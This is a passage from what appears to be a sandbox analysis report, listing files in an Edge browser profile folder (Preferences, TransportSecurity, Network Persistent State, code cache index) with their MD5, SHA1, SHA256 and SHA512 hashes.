| SHA512 | 1ca1c10fb45248d2570f2f9972734be4a9047580664ae174d66c3431573a7b348251e6f876555c82c816a873f46104064b4adab82fbc9a3eb00b70ce118bdaab |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 218edef7a2a3df9cfc878796a811a6c0 |
| SHA1 | ab8523ffd4f6860af430d32fa0790dce11fb4c5a |
| SHA256 | 94178a02ef6225ecef9b1965bd8c812ffc94392fa2680b6026e5b697c09bec88 |
| SHA512 | 245e17a1ed4574efe0eab4d66fd0042508f8c37d5b1b6357feca7cf3cc31cbecd3b86c50c6b38c52db1ea2bb76d33a45325f596495fe5bb8fbaeccc149e40b76 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c85584a8941801c467a7d242ff8d14ff |
| SHA1 | e188ab0e46f1621f4ec8a41722cce1f9c235ed25 |
| SHA256 | 302530a45a94200820ea0ffb8802dcb49caaf47798befe4148157a5b3a30a005 |
| SHA512 | 8d999e275ae72eacd52aa8a5257f1e301f4c53affed6b9b39d493980b5ac82a99ae52fb921f01c3941ecc3985ca517c3bcbfa685c3e8a20acb4c1332c839f897 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | b3ef340b356f4e00f2ecb405ce8fc26e |
| SHA1 | adb75439c68362ae22bc75a362c8dbff25132526 |
| SHA256 | 6b669ff27e61cf8ee5eb39f0de54f91767f98217d94054c04db3114314b230ac |
| SHA512 | 4d6986310f4d1b0445c54f11ac0e58e00408479251493c853f76222188c46ee2633daed8e71e5b78d864722acb21771ef1986d48ae5671148a82f2e5e4e4f5d8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 619d73da29358847d789446f0422487a |
| SHA1 | 76ec7e772ac1e8a5885251f925fdf3c21ccda980 |
| SHA256 | e1fa63e763ec7af90a5d00176b45dc83d27bf559e51362895f122cc541c435b6 |
| SHA512 | 883907fb469cf146790988fcb860f9655abe8729773af3c7a41b5479364dc2491faa2a2e586ab30bdc5de2d573604cab5786b2d4f46c8929870793366e96c910 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 6db47911819db7c9debeb000f9b237bc |
| SHA1 | 53fdd121707ef6de4c356f333cac10078f9ce216 |
| SHA256 | d1d5214e2301995b9487d495dbbaef33512a286a5bbe30e6417e47ab4735e29b |
| SHA512 | 9cd646292ea58bd93a0e0332aefd4b2e1852a6b2b19b7d674f9cccccd8e4ad4843074d87f31d0f19bbbc6fa22b4081aa031254763f4f687f93e3b82aae17a78d |